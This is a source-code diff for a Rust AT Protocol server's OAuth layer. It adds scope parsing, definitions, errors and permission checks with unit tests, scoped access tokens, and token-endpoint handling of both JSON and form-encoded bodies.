base.split(':').next().unwrap_or(base) 240 + } 241 + 242 + let client_type = get_resource_type(client_scope); 243 + let requested_type = get_resource_type(requested_scope); 244 + 245 + if client_type == requested_type { 246 + let client_base = client_scope.split('?').next().unwrap_or(client_scope); 247 + if client_base.contains('*') { 248 + return true; 249 + } 250 + } 251 + 252 + false 253 + }
+37 -20
src/oauth/endpoints/token/grants.rs
··· 36 36 )); 37 37 } 38 38 if let Some(request_client_id) = &request.client_id 39 - && request_client_id != &auth_request.client_id { 40 - return Err(OAuthError::InvalidGrant("client_id mismatch".to_string())); 41 - } 39 + && request_client_id != &auth_request.client_id 40 + { 41 + return Err(OAuthError::InvalidGrant("client_id mismatch".to_string())); 42 + } 42 43 let did = auth_request 43 44 .did 44 45 .ok_or_else(|| OAuthError::InvalidGrant("Authorization not completed".to_string()))?; ··· 65 66 verify_client_auth(&client_metadata_cache, &client_metadata, &client_auth).await?; 66 67 verify_pkce(&auth_request.parameters.code_challenge, &code_verifier)?; 67 68 if let Some(redirect_uri) = &request.redirect_uri 68 - && redirect_uri != &auth_request.parameters.redirect_uri { 69 - return Err(OAuthError::InvalidGrant( 70 - "redirect_uri mismatch".to_string(), 71 - )); 72 - } 69 + && redirect_uri != &auth_request.parameters.redirect_uri 70 + { 71 + return Err(OAuthError::InvalidGrant( 72 + "redirect_uri mismatch".to_string(), 73 + )); 74 + } 73 75 let dpop_jkt = if let Some(proof) = &dpop_proof { 74 76 let config = AuthConfig::get(); 75 77 let verifier = DPoPVerifier::new(config.dpop_secret().as_bytes()); ··· 83 85 )); 84 86 } 85 87 if let Some(expected_jkt) = &auth_request.parameters.dpop_jkt 86 - && &result.jkt != expected_jkt { 87 - return Err(OAuthError::InvalidDpopProof( 88 - "DPoP key binding mismatch".to_string(), 89 - )); 90 - } 88 + && &result.jkt != expected_jkt 89 + { 90 + return Err(OAuthError::InvalidDpopProof( 91 + "DPoP key binding mismatch".to_string(), 92 + )); 93 + } 91 94 Some(result.jkt) 92 95 } else if auth_request.parameters.dpop_jkt.is_some() { 93 96 return Err(OAuthError::InvalidRequest( ··· 96 99 } else { 97 100 None 98 101 }; 102 + if let Err(e) = db::revoke_tokens_for_client(&state.db, &did, &auth_request.client_id).await { 103 + tracing::warn!("Failed to revoke previous tokens for client: {:?}", e); 104 + } 99 105 let token_id = TokenId::generate(); 100 106 let refresh_token = RefreshToken::generate(); 101 107 let now = Utc::now(); 102 - let access_token = create_access_token(&token_id.0, &did, dpop_jkt.as_deref())?; 108 + let access_token = create_access_token( 109 + &token_id.0, 110 + &did, 111 + dpop_jkt.as_deref(), 112 + auth_request.parameters.scope.as_deref(), 113 + )?; 103 114 let token_data = TokenData { 104 115 did: did.clone(), 105 116 token_id: token_id.0.clone(), ··· 179 190 )); 180 191 } 181 192 if let Some(expected_jkt) = &token_data.parameters.dpop_jkt 182 - && &result.jkt != expected_jkt { 183 - return Err(OAuthError::InvalidDpopProof( 184 - "DPoP key binding mismatch".to_string(), 185 - )); 186 - } 193 + && &result.jkt != expected_jkt 194 + { 195 + return Err(OAuthError::InvalidDpopProof( 196 + "DPoP key binding mismatch".to_string(), 197 + )); 198 + } 187 199 Some(result.jkt) 188 200 } else if token_data.parameters.dpop_jkt.is_some() { 189 201 return Err(OAuthError::InvalidRequest( ··· 203 215 new_expires_at, 204 216 ) 205 217 .await?; 206 - let access_token = create_access_token(&new_token_id.0, &token_data.did, dpop_jkt.as_deref())?; 218 + let access_token = create_access_token( 219 + &new_token_id.0, 220 + &token_data.did, 221 + dpop_jkt.as_deref(), 222 + token_data.scope.as_deref(), 223 + )?; 207 224 let mut response_headers = HeaderMap::new(); 208 225 let config = AuthConfig::get(); 209 226 let verifier = DPoPVerifier::new(config.dpop_secret().as_bytes());
+3 -1
src/oauth/endpoints/token/helpers.rs
··· 36 36 token_id: &str, 37 37 sub: &str, 38 38 dpop_jkt: Option<&str>, 39 + scope: Option<&str>, 39 40 ) -> Result<String, OAuthError> { 40 41 use serde_json::json; 41 42 let pds_hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 42 43 let issuer = format!("https://{}", pds_hostname); 43 44 let now = Utc::now().timestamp(); 44 45 let exp = now + ACCESS_TOKEN_EXPIRY_SECONDS; 46 + let actual_scope = scope.unwrap_or("atproto"); 45 47 let mut payload = json!({ 46 48 "iss": issuer, 47 49 "sub": sub, ··· 49 51 "iat": now, 50 52 "exp": exp, 51 53 "jti": token_id, 52 - "scope": "atproto" 54 + "scope": actual_scope 53 55 }); 54 56 if let Some(jkt) = dpop_jkt { 55 57 payload["cnf"] = json!({ "jkt": jkt });
+27 -8
src/oauth/endpoints/token/mod.rs
··· 5 5 6 6 use crate::oauth::OAuthError; 7 7 use crate::state::{AppState, RateLimitKind}; 8 - use axum::{Form, Json, extract::State, http::HeaderMap}; 8 + use axum::body::Bytes; 9 + use axum::{Json, extract::State, http::HeaderMap}; 9 10 10 11 pub use grants::{handle_authorization_code_grant, handle_refresh_token_grant}; 11 12 pub use helpers::{TokenClaims, create_access_token, extract_token_claims, verify_pkce}; ··· 17 18 fn extract_client_ip(headers: &HeaderMap) -> String { 18 19 if let Some(forwarded) = headers.get("x-forwarded-for") 19 20 && let Ok(value) = forwarded.to_str() 20 - && let Some(first_ip) = value.split(',').next() { 21 - return first_ip.trim().to_string(); 22 - } 21 + && let Some(first_ip) = value.split(',').next() 22 + { 23 + return first_ip.trim().to_string(); 24 + } 23 25 if let Some(real_ip) = headers.get("x-real-ip") 24 - && let Ok(value) = real_ip.to_str() { 25 - return value.trim().to_string(); 26 - } 26 + && let Ok(value) = real_ip.to_str() 27 + { 28 + return value.trim().to_string(); 29 + } 27 30 "unknown".to_string() 28 31 } 29 32 30 33 pub async fn token_endpoint( 31 34 State(state): State<AppState>, 32 35 headers: HeaderMap, 33 - Form(request): Form<TokenRequest>, 36 + body: Bytes, 34 37 ) -> Result<(HeaderMap, Json<TokenResponse>), OAuthError> { 38 + let content_type = headers 39 + .get("content-type") 40 + .and_then(|v| v.to_str().ok()) 41 + .unwrap_or(""); 42 + let request: TokenRequest = if content_type.starts_with("application/json") { 43 + serde_json::from_slice(&body) 44 + .map_err(|e| OAuthError::InvalidRequest(format!("Invalid JSON: {}", e)))? 45 + } else if content_type.starts_with("application/x-www-form-urlencoded") { 46 + serde_urlencoded::from_bytes(&body) 47 + .map_err(|e| OAuthError::InvalidRequest(format!("Invalid form data: {}", e)))? 48 + } else { 49 + return Err(OAuthError::InvalidRequest( 50 + "Content-Type must be application/json or application/x-www-form-urlencoded" 51 + .to_string(), 52 + )); 53 + }; 35 54 let client_ip = extract_client_ip(&headers); 36 55 if !state 37 56 .check_rate_limit(RateLimitKind::OAuthToken, &client_ip)
+2 -2
src/oauth/mod.rs
··· 4 4 pub mod endpoints; 5 5 pub mod error; 6 6 pub mod jwks; 7 - pub mod templates; 7 + pub mod scopes; 8 8 pub mod types; 9 9 pub mod verify; 10 10 11 11 pub use error::OAuthError; 12 - pub use templates::{DeviceAccount, mask_email}; 12 + pub use scopes::{AccountAction, AccountAttr, RepoAction, ScopeError, ScopePermissions}; 13 13 pub use types::*; 14 14 pub use verify::{ 15 15 OAuthAuthError, OAuthUser, VerifyResult, generate_dpop_nonce, verify_oauth_access_token,
+134
src/oauth/scopes/definitions.rs
··· 1 + use std::collections::HashMap; 2 + use std::sync::LazyLock; 3 + 4 + #[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)] 5 + pub enum ScopeCategory { 6 + Core, 7 + Transition, 8 + Repo, 9 + Blob, 10 + Rpc, 11 + Account, 12 + } 13 + 14 + impl ScopeCategory { 15 + pub fn display_name(&self) -> &'static str { 16 + match self { 17 + ScopeCategory::Core => "Core Access", 18 + ScopeCategory::Transition => "Transition", 19 + ScopeCategory::Repo => "Repository", 20 + ScopeCategory::Blob => "Media", 21 + ScopeCategory::Rpc => "API Access", 22 + ScopeCategory::Account => "Account", 23 + } 24 + } 25 + } 26 + 27 + #[derive(Debug, Clone)] 28 + pub struct ScopeDefinition { 29 + pub scope: &'static str, 30 + pub category: ScopeCategory, 31 + pub required: bool, 32 + pub description: &'static str, 33 + pub display_name: &'static str, 34 + } 35 + 36 + pub static SCOPE_DEFINITIONS: LazyLock<HashMap<&'static str, ScopeDefinition>> = 37 + LazyLock::new(|| { 38 + let definitions = vec![ 39 + ScopeDefinition { 40 + scope: "atproto", 41 + category: ScopeCategory::Core, 42 + required: true, 43 + description: "Use AT Protocol OAuth (required for all sessions)", 44 + display_name: "AT Protocol", 45 + }, 46 + ScopeDefinition { 47 + scope: "transition:generic", 48 + category: ScopeCategory::Transition, 49 + required: false, 50 + description: "Generic transition scope for compatibility", 51 + display_name: "Transition Access", 52 + }, 53 + ScopeDefinition { 54 + scope: "transition:chat.bsky", 55 + category: ScopeCategory::Transition, 56 + required: false, 57 + description: "Access to Bluesky chat features", 58 + display_name: "Chat Access", 59 + }, 60 + ScopeDefinition { 61 + scope: "transition:email", 62 + category: ScopeCategory::Account, 63 + required: false, 64 + description: "Read your account email address", 65 + display_name: "Email Access", 66 + }, 67 + ScopeDefinition { 68 + scope: "repo:*?action=create", 69 + category: ScopeCategory::Repo, 70 + required: false, 71 + description: "Create new records in your repository", 72 + display_name: "Create Records", 73 + }, 74 + ScopeDefinition { 75 + scope: "repo:*?action=update", 76 + category: ScopeCategory::Repo, 77 + required: false, 78 + description: "Update existing records in your repository", 79 + display_name: "Update Records", 80 + }, 81 + ScopeDefinition { 82 + scope: "repo:*?action=delete", 83 + category: ScopeCategory::Repo, 84 + required: false, 85 + description: "Delete records from your repository", 86 + display_name: "Delete Records", 87 + }, 88 + ScopeDefinition { 89 + scope: "blob:*/*", 90 + category: ScopeCategory::Blob, 91 + required: false, 92 + description: "Upload images, videos, and other media files", 93 + display_name: "Upload Media", 94 + }, 95 + ]; 96 + 97 + definitions.into_iter().map(|d| (d.scope, d)).collect() 98 + }); 99 + 100 + #[allow(dead_code)] 101 + pub fn get_scope_definition(scope: &str) -> Option<&'static ScopeDefinition> { 102 + SCOPE_DEFINITIONS.get(scope) 103 + } 104 + 105 + #[allow(dead_code)] 106 + pub fn is_valid_scope(scope: &str) -> bool { 107 + if SCOPE_DEFINITIONS.contains_key(scope) { 108 + return true; 109 + } 110 + if scope.starts_with("ref:") { 111 + return true; 112 + } 113 + false 114 + } 115 + 116 + #[allow(dead_code)] 117 + pub fn get_required_scopes() -> Vec<&'static str> { 118 + SCOPE_DEFINITIONS 119 + .values() 120 + .filter(|d| d.required) 121 + .map(|d| d.scope) 122 + .collect() 123 + } 124 + 125 + #[allow(dead_code)] 126 + pub fn format_scope_for_display(scope: &str) -> String { 127 + if let Some(def) = get_scope_definition(scope) { 128 + def.description.to_string() 129 + } else if scope.starts_with("ref:") { 130 + "Referenced scope".to_string() 131 + } else { 132 + format!("Access to {}", scope) 133 + } 134 + }
+39
src/oauth/scopes/error.rs
··· 1 + use axum::http::StatusCode; 2 + use axum::response::{IntoResponse, Response}; 3 + use serde_json::json; 4 + 5 + #[derive(Debug, Clone)] 6 + pub enum ScopeError { 7 + InsufficientScope { required: String, message: String }, 8 + InvalidScope(String), 9 + } 10 + 11 + impl std::fmt::Display for ScopeError { 12 + fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { 13 + match self { 14 + ScopeError::InsufficientScope { message, .. } => write!(f, "{}", message), 15 + ScopeError::InvalidScope(msg) => write!(f, "Invalid scope: {}", msg), 16 + } 17 + } 18 + } 19 + 20 + impl std::error::Error for ScopeError {} 21 + 22 + impl IntoResponse for ScopeError { 23 + fn into_response(self) -> Response { 24 + let (status, error_code, message) = match &self { 25 + ScopeError::InsufficientScope { message, .. } => { 26 + (StatusCode::FORBIDDEN, "InsufficientScope", message.clone()) 27 + } 28 + ScopeError::InvalidScope(msg) => (StatusCode::BAD_REQUEST, "InvalidScope", msg.clone()), 29 + }; 30 + ( 31 + status, 32 + axum::Json(json!({ 33 + "error": error_code, 34 + "message": message 35 + })), 36 + ) 37 + .into_response() 38 + } 39 + }
+12
src/oauth/scopes/mod.rs
··· 1 + mod definitions; 2 + mod error; 3 + mod parser; 4 + mod permissions; 5 + 6 + pub use definitions::{SCOPE_DEFINITIONS, ScopeCategory, ScopeDefinition}; 7 + pub use error::ScopeError; 8 + pub use parser::{ 9 + AccountAction, AccountAttr, AccountScope, BlobScope, IdentityAttr, IdentityScope, IncludeScope, 10 + ParsedScope, RepoAction, RepoScope, RpcScope, parse_scope, parse_scope_string, 11 + }; 12 + pub use permissions::ScopePermissions;
+483
src/oauth/scopes/parser.rs
··· 1 + use std::collections::{HashMap, HashSet}; 2 + 3 + #[derive(Debug, Clone, PartialEq, Eq)] 4 + pub enum ParsedScope { 5 + Atproto, 6 + TransitionGeneric, 7 + TransitionChat, 8 + TransitionEmail, 9 + Repo(RepoScope), 10 + Blob(BlobScope), 11 + Rpc(RpcScope), 12 + Account(AccountScope), 13 + Identity(IdentityScope), 14 + Include(IncludeScope), 15 + Unknown(String), 16 + } 17 + 18 + #[derive(Debug, Clone, PartialEq, Eq)] 19 + pub struct IncludeScope { 20 + pub nsid: String, 21 + pub aud: Option<String>, 22 + } 23 + 24 + #[derive(Debug, Clone, PartialEq, Eq)] 25 + pub struct RepoScope { 26 + pub collection: Option<String>, 27 + pub actions: HashSet<RepoAction>, 28 + } 29 + 30 + #[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)] 31 + pub enum RepoAction { 32 + Create, 33 + Update, 34 + Delete, 35 + } 36 + 37 + impl RepoAction { 38 + pub fn parse_str(s: &str) -> Option<Self> { 39 + match s { 40 + "create" => Some(Self::Create), 41 + "update" => Some(Self::Update), 42 + "delete" => Some(Self::Delete), 43 + _ => None, 44 + } 45 + } 46 + } 47 + 48 + #[derive(Debug, Clone, PartialEq, Eq)] 49 + pub struct BlobScope { 50 + pub accept: HashSet<String>, 51 + } 52 + 53 + impl BlobScope { 54 + pub fn matches_mime(&self, mime: &str) -> bool { 55 + if self.accept.is_empty() || self.accept.contains("*/*") { 56 + return true; 57 + } 58 + for pattern in &self.accept { 59 + if pattern == mime { 60 + return true; 61 + } 62 + if let Some(prefix) = pattern.strip_suffix("/*") 63 + && mime.starts_with(prefix) 64 + && mime.chars().nth(prefix.len()) == Some('/') 65 + { 66 + return true; 67 + } 68 + } 69 + false 70 + } 71 + } 72 + 73 + #[derive(Debug, Clone, PartialEq, Eq)] 74 + pub struct RpcScope { 75 + pub lxm: Option<String>, 76 + pub aud: Option<String>, 77 + } 78 + 79 + #[derive(Debug, Clone, PartialEq, Eq)] 80 + pub struct AccountScope { 81 + pub attr: AccountAttr, 82 + pub action: AccountAction, 83 + } 84 + 85 + #[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)] 86 + pub enum AccountAttr { 87 + Email, 88 + Handle, 89 + Repo, 90 + Status, 91 + } 92 + 93 + #[derive(Debug, Clone, PartialEq, Eq)] 94 + pub struct IdentityScope { 95 + pub attr: IdentityAttr, 96 + } 97 + 98 + #[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)] 99 + pub enum IdentityAttr { 100 + Handle, 101 + Wildcard, 102 + } 103 + 104 + impl AccountAttr { 105 + pub fn parse_str(s: &str) -> Option<Self> { 106 + match s { 107 + "email" => Some(Self::Email), 108 + "handle" => Some(Self::Handle), 109 + "repo" => Some(Self::Repo), 110 + "status" => Some(Self::Status), 111 + _ => None, 112 + } 113 + } 114 + } 115 + 116 + impl IdentityAttr { 117 + pub fn parse_str(s: &str) -> Option<Self> { 118 + match s { 119 + "handle" => Some(Self::Handle), 120 + "*" => Some(Self::Wildcard), 121 + _ => None, 122 + } 123 + } 124 + } 125 + 126 + #[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)] 127 + pub enum AccountAction { 128 + Read, 129 + Manage, 130 + } 131 + 132 + impl AccountAction { 133 + pub fn parse_str(s: &str) -> Option<Self> { 134 + match s { 135 + "read" => Some(Self::Read), 136 + "manage" => Some(Self::Manage), 137 + _ => None, 138 + } 139 + } 140 + } 141 + 142 + fn parse_query_params(query: &str) -> HashMap<String, Vec<String>> { 143 + let mut params: HashMap<String, Vec<String>> = HashMap::new(); 144 + for part in query.split('&') { 145 + if let Some((key, value)) = part.split_once('=') { 146 + params 147 + .entry(key.to_string()) 148 + .or_default() 149 + .push(value.to_string()); 150 + } 151 + } 152 + params 153 + } 154 + 155 + pub fn parse_scope(scope: &str) -> ParsedScope { 156 + match scope { 157 + "atproto" => return ParsedScope::Atproto, 158 + "transition:generic" => return ParsedScope::TransitionGeneric, 159 + "transition:chat.bsky" => return ParsedScope::TransitionChat, 160 + "transition:email" => return ParsedScope::TransitionEmail, 161 + _ => {} 162 + } 163 + 164 + let (base, query) = scope.split_once('?').unwrap_or((scope, "")); 165 + let params = parse_query_params(query); 166 + 167 + if let Some(rest) = base.strip_prefix("repo:") { 168 + let collection = if rest == "*" || rest.is_empty() { 169 + None 170 + } else { 171 + Some(rest.to_string()) 172 + }; 173 + 174 + let mut actions = HashSet::new(); 175 + if let Some(action_values) = params.get("action") { 176 + for action_str in action_values { 177 + if let Some(action) = RepoAction::parse_str(action_str) { 178 + actions.insert(action); 179 + } 180 + } 181 + } 182 + if actions.is_empty() { 183 + actions.insert(RepoAction::Create); 184 + actions.insert(RepoAction::Update); 185 + actions.insert(RepoAction::Delete); 186 + } 187 + 188 + return ParsedScope::Repo(RepoScope { 189 + collection, 190 + actions, 191 + }); 192 + } 193 + 194 + if base == "repo" { 195 + let mut actions = HashSet::new(); 196 + if let Some(action_values) = params.get("action") { 197 + for action_str in action_values { 198 + if let Some(action) = RepoAction::parse_str(action_str) { 199 + actions.insert(action); 200 + } 201 + } 202 + } 203 + if actions.is_empty() { 204 + actions.insert(RepoAction::Create); 205 + actions.insert(RepoAction::Update); 206 + actions.insert(RepoAction::Delete); 207 + } 208 + return ParsedScope::Repo(RepoScope { 209 + collection: None, 210 + actions, 211 + }); 212 + } 213 + 214 + if base.starts_with("blob") { 215 + let positional = base.strip_prefix("blob:").unwrap_or(""); 216 + let mut accept = HashSet::new(); 217 + 218 + if !positional.is_empty() { 219 + accept.insert(positional.to_string()); 220 + } 221 + if let Some(accept_values) = params.get("accept") { 222 + for v in accept_values { 223 + accept.insert(v.to_string()); 224 + } 225 + } 226 + 227 + return ParsedScope::Blob(BlobScope { accept }); 228 + } 229 + 230 + if base.starts_with("rpc") { 231 + let lxm_positional = base.strip_prefix("rpc:").map(|s| s.to_string()); 232 + let lxm = lxm_positional.or_else(|| params.get("lxm").and_then(|v| v.first().cloned())); 233 + let aud = params.get("aud").and_then(|v| v.first().cloned()); 234 + 235 + let is_lxm_wildcard = lxm.as_deref() == Some("*") || lxm.is_none(); 236 + let is_aud_wildcard = aud.as_deref() == Some("*"); 237 + if is_lxm_wildcard && is_aud_wildcard { 238 + return ParsedScope::Unknown(scope.to_string()); 239 + } 240 + 241 + return ParsedScope::Rpc(RpcScope { lxm, aud }); 242 + } 243 + 244 + if let Some(attr_str) = base.strip_prefix("account:") 245 + && let Some(attr) = AccountAttr::parse_str(attr_str) 246 + { 247 + let action = params 248 + .get("action") 249 + .and_then(|v| v.first()) 250 + .and_then(|s| AccountAction::parse_str(s)) 251 + .unwrap_or(AccountAction::Read); 252 + 253 + return ParsedScope::Account(AccountScope { attr, action }); 254 + } 255 + 256 + if let Some(attr_str) = base.strip_prefix("identity:") 257 + && let Some(attr) = IdentityAttr::parse_str(attr_str) 258 + { 259 + return ParsedScope::Identity(IdentityScope { attr }); 260 + } 261 + 262 + if let Some(nsid) = base.strip_prefix("include:") { 263 + let aud = params.get("aud").and_then(|v| v.first().cloned()); 264 + return ParsedScope::Include(IncludeScope { 265 + nsid: nsid.to_string(), 266 + aud, 267 + }); 268 + } 269 + 270 + ParsedScope::Unknown(scope.to_string()) 271 + } 272 + 273 + pub fn parse_scope_string(scope_str: &str) -> Vec<ParsedScope> { 274 + scope_str.split_whitespace().map(parse_scope).collect() 275 + } 276 + 277 + #[cfg(test)] 278 + mod tests { 279 + use super::*; 280 + 281 + #[test] 282 + fn test_parse_atproto() { 283 + assert_eq!(parse_scope("atproto"), ParsedScope::Atproto); 284 + } 285 + 286 + #[test] 287 + fn test_parse_transition_scopes() { 288 + assert_eq!( 289 + parse_scope("transition:generic"), 290 + ParsedScope::TransitionGeneric 291 + ); 292 + assert_eq!( 293 + parse_scope("transition:chat.bsky"), 294 + ParsedScope::TransitionChat 295 + ); 296 + assert_eq!( 297 + parse_scope("transition:email"), 298 + ParsedScope::TransitionEmail 299 + ); 300 + } 301 + 302 + #[test] 303 + fn test_parse_repo_wildcard() { 304 + let scope = parse_scope("repo:*?action=create"); 305 + match scope { 306 + ParsedScope::Repo(r) => { 307 + assert!(r.collection.is_none()); 308 + assert!(r.actions.contains(&RepoAction::Create)); 309 + assert!(!r.actions.contains(&RepoAction::Update)); 310 + } 311 + _ => panic!("Expected Repo scope"), 312 + } 313 + } 314 + 315 + #[test] 316 + fn test_parse_repo_collection() { 317 + let scope = parse_scope("repo:app.bsky.feed.post?action=create&action=delete"); 318 + match scope { 319 + ParsedScope::Repo(r) => { 320 + assert_eq!(r.collection, Some("app.bsky.feed.post".to_string())); 321 + assert!(r.actions.contains(&RepoAction::Create)); 322 + assert!(r.actions.contains(&RepoAction::Delete)); 323 + assert!(!r.actions.contains(&RepoAction::Update)); 324 + } 325 + _ => panic!("Expected Repo scope"), 326 + } 327 + } 328 + 329 + #[test] 330 + fn test_parse_repo_no_actions_means_all() { 331 + let scope = parse_scope("repo:app.bsky.feed.post"); 332 + match scope { 333 + ParsedScope::Repo(r) => { 334 + assert!(r.actions.contains(&RepoAction::Create)); 335 + assert!(r.actions.contains(&RepoAction::Update)); 336 + assert!(r.actions.contains(&RepoAction::Delete)); 337 + } 338 + _ => panic!("Expected Repo scope"), 339 + } 340 + } 341 + 342 + #[test] 343 + fn test_parse_blob_wildcard() { 344 + let scope = parse_scope("blob:*/*"); 345 + match scope { 346 + ParsedScope::Blob(b) => { 347 + assert!(b.accept.contains("*/*")); 348 + assert!(b.matches_mime("image/png")); 349 + assert!(b.matches_mime("video/mp4")); 350 + } 351 + _ => panic!("Expected Blob scope"), 352 + } 353 + } 354 + 355 + #[test] 356 + fn test_parse_blob_specific() { 357 + let scope = parse_scope("blob?accept=image/*&accept=video/*"); 358 + match scope { 359 + ParsedScope::Blob(b) => { 360 + assert!(b.matches_mime("image/png")); 361 + assert!(b.matches_mime("image/jpeg")); 362 + assert!(b.matches_mime("video/mp4")); 363 + assert!(!b.matches_mime("text/plain")); 364 + } 365 + _ => panic!("Expected Blob scope"), 366 + } 367 + } 368 + 369 + #[test] 370 + fn test_parse_rpc() { 371 + let scope = parse_scope("rpc:app.bsky.feed.getTimeline?aud=did:web:api.bsky.app"); 372 + match scope { 373 + ParsedScope::Rpc(r) => { 374 + assert_eq!(r.lxm, Some("app.bsky.feed.getTimeline".to_string())); 375 + assert_eq!(r.aud, Some("did:web:api.bsky.app".to_string())); 376 + } 377 + _ => panic!("Expected Rpc scope"), 378 + } 379 + } 380 + 381 + #[test] 382 + fn test_parse_account() { 383 + let scope = parse_scope("account:email?action=read"); 384 + match scope { 385 + ParsedScope::Account(a) => { 386 + assert_eq!(a.attr, AccountAttr::Email); 387 + assert_eq!(a.action, AccountAction::Read); 388 + } 389 + _ => panic!("Expected Account scope"), 390 + } 391 + 392 + let scope2 = parse_scope("account:repo?action=manage"); 393 + match scope2 { 394 + ParsedScope::Account(a) => { 395 + assert_eq!(a.attr, AccountAttr::Repo); 396 + assert_eq!(a.action, AccountAction::Manage); 397 + } 398 + _ => panic!("Expected Account scope"), 399 + } 400 + } 401 + 402 + #[test] 403 + fn test_parse_scope_string() { 404 + let scopes = parse_scope_string("atproto repo:*?action=create blob:*/*"); 405 + assert_eq!(scopes.len(), 3); 406 + assert_eq!(scopes[0], ParsedScope::Atproto); 407 + match &scopes[1] { 408 + ParsedScope::Repo(_) => {} 409 + _ => panic!("Expected Repo"), 410 + } 411 + match &scopes[2] { 412 + ParsedScope::Blob(_) => {} 413 + _ => panic!("Expected Blob"), 414 + } 415 + } 416 + 417 + #[test] 418 + fn test_parse_include() { 419 + let scope = parse_scope("include:app.bsky.authFullApp?aud=did:web:api.bsky.app"); 420 + match scope { 421 + ParsedScope::Include(i) => { 422 + assert_eq!(i.nsid, "app.bsky.authFullApp"); 423 + assert_eq!(i.aud, Some("did:web:api.bsky.app".to_string())); 424 + } 425 + _ => panic!("Expected Include scope"), 426 + } 427 + 428 + let scope2 = parse_scope("include:com.example.authBasicFeatures"); 429 + match scope2 { 430 + ParsedScope::Include(i) => { 431 + assert_eq!(i.nsid, "com.example.authBasicFeatures"); 432 + assert_eq!(i.aud, None); 433 + } 434 + _ => panic!("Expected Include scope"), 435 + } 436 + } 437 + 438 + #[test] 439 + fn test_parse_identity() { 440 + let scope = parse_scope("identity:handle"); 441 + match scope { 442 + ParsedScope::Identity(i) => { 443 + assert_eq!(i.attr, IdentityAttr::Handle); 444 + } 445 + _ => panic!("Expected Identity scope"), 446 + } 447 + 448 + let scope2 = parse_scope("identity:*"); 449 + match scope2 { 450 + ParsedScope::Identity(i) => { 451 + assert_eq!(i.attr, IdentityAttr::Wildcard); 452 + } 453 + _ => panic!("Expected Identity scope"), 454 + } 455 + } 456 + 457 + #[test] 458 + fn test_parse_account_status() { 459 + let scope = parse_scope("account:status?action=read"); 460 + match scope { 461 + ParsedScope::Account(a) => { 462 + assert_eq!(a.attr, AccountAttr::Status); 463 + assert_eq!(a.action, AccountAction::Read); 464 + } 465 + _ => panic!("Expected Account scope"), 466 + } 467 + } 468 + 469 + #[test] 470 + fn test_rpc_wildcard_aud_forbidden() { 471 + let scope = parse_scope("rpc:*?aud=*"); 472 + assert!(matches!(scope, ParsedScope::Unknown(_))); 473 + 474 + let scope2 = parse_scope("rpc?aud=*"); 475 + assert!(matches!(scope2, ParsedScope::Unknown(_))); 476 + 477 + let scope3 = parse_scope("rpc:app.bsky.feed.getTimeline?aud=*"); 478 + assert!(matches!(scope3, ParsedScope::Rpc(_))); 479 + 480 + let scope4 = parse_scope("rpc:*?aud=did:web:api.bsky.app"); 481 + assert!(matches!(scope4, ParsedScope::Rpc(_))); 482 + } 483 + }
+488
src/oauth/scopes/permissions.rs
··· 1 + use super::error::ScopeError; 2 + use super::parser::{ 3 + AccountAction, AccountAttr, BlobScope, IdentityAttr, IdentityScope, ParsedScope, RepoAction, 4 + RepoScope, RpcScope, parse_scope_string, 5 + }; 6 + use std::collections::HashSet; 7 + 8 + #[derive(Debug, Clone)] 9 + pub struct ScopePermissions { 10 + scopes: HashSet<String>, 11 + parsed: Vec<ParsedScope>, 12 + has_atproto: bool, 13 + has_transition_generic: bool, 14 + has_transition_chat: bool, 15 + has_transition_email: bool, 16 + } 17 + 18 + impl ScopePermissions { 19 + pub fn from_scope_string(scope: Option<&str>) -> Self { 20 + let scope_str = scope.unwrap_or("atproto"); 21 + let scopes: HashSet<String> = scope_str 22 + .split_whitespace() 23 + .map(|s| s.to_string()) 24 + .collect(); 25 + 26 + let parsed = parse_scope_string(scope_str); 27 + 28 + let has_atproto = parsed.iter().any(|p| matches!(p, ParsedScope::Atproto)); 29 + let has_transition_generic = parsed 30 + .iter() 31 + .any(|p| matches!(p, ParsedScope::TransitionGeneric)); 32 + let has_transition_chat = parsed 33 + .iter() 34 + .any(|p| matches!(p, ParsedScope::TransitionChat)); 35 + let has_transition_email = parsed 36 + .iter() 37 + .any(|p| matches!(p, ParsedScope::TransitionEmail)); 38 + 39 + Self { 40 + scopes, 41 + parsed, 42 + has_atproto, 43 + has_transition_generic, 44 + has_transition_chat, 45 + has_transition_email, 46 + } 47 + } 48 + 49 + pub fn has_scope(&self, scope: &str) -> bool { 50 + self.scopes.contains(scope) 51 + } 52 + 53 + pub fn scopes(&self) -> &HashSet<String> { 54 + &self.scopes 55 + } 56 + 57 + pub fn has_full_access(&self) -> bool { 58 + self.has_atproto 59 + } 60 + 61 + fn find_repo_scopes(&self) -> impl Iterator<Item = &RepoScope> { 62 + self.parsed.iter().filter_map(|p| { 63 + if let ParsedScope::Repo(r) = p { 64 + Some(r) 65 + } else { 66 + None 67 + } 68 + }) 69 + } 70 + 71 + fn find_blob_scopes(&self) -> impl Iterator<Item = &BlobScope> { 72 + self.parsed.iter().filter_map(|p| { 73 + if let ParsedScope::Blob(b) = p { 74 + Some(b) 75 + } else { 76 + None 77 + } 78 + }) 79 + } 80 + 81 + fn find_rpc_scopes(&self) -> impl Iterator<Item = &RpcScope> { 82 + self.parsed.iter().filter_map(|p| { 83 + if let ParsedScope::Rpc(r) = p { 84 + Some(r) 85 + } else { 86 + None 87 + } 88 + }) 89 + } 90 + 91 + fn find_account_scopes(&self) -> impl Iterator<Item = &super::parser::AccountScope> { 92 + self.parsed.iter().filter_map(|p| { 93 + if let ParsedScope::Account(a) = p { 94 + Some(a) 95 + } else { 96 + None 97 + } 98 + }) 99 + } 100 + 101 + fn find_identity_scopes(&self) -> impl Iterator<Item = &IdentityScope> { 102 + self.parsed.iter().filter_map(|p| { 103 + if let ParsedScope::Identity(i) = p { 104 + Some(i) 105 + } else { 106 + None 107 + } 108 + }) 109 + } 110 + 111 + pub fn assert_repo(&self, action: RepoAction, collection: &str) -> Result<(), ScopeError> { 112 + if self.has_atproto || self.has_transition_generic { 113 + return Ok(()); 114 + } 115 + 116 + for repo_scope in self.find_repo_scopes() { 117 + if !repo_scope.actions.contains(&action) { 118 + continue; 119 + } 120 + 121 + match &repo_scope.collection { 122 + None => return Ok(()), 123 + Some(coll) if coll == collection => return Ok(()), 124 + Some(coll) if coll.ends_with(".*") => { 125 + let prefix = 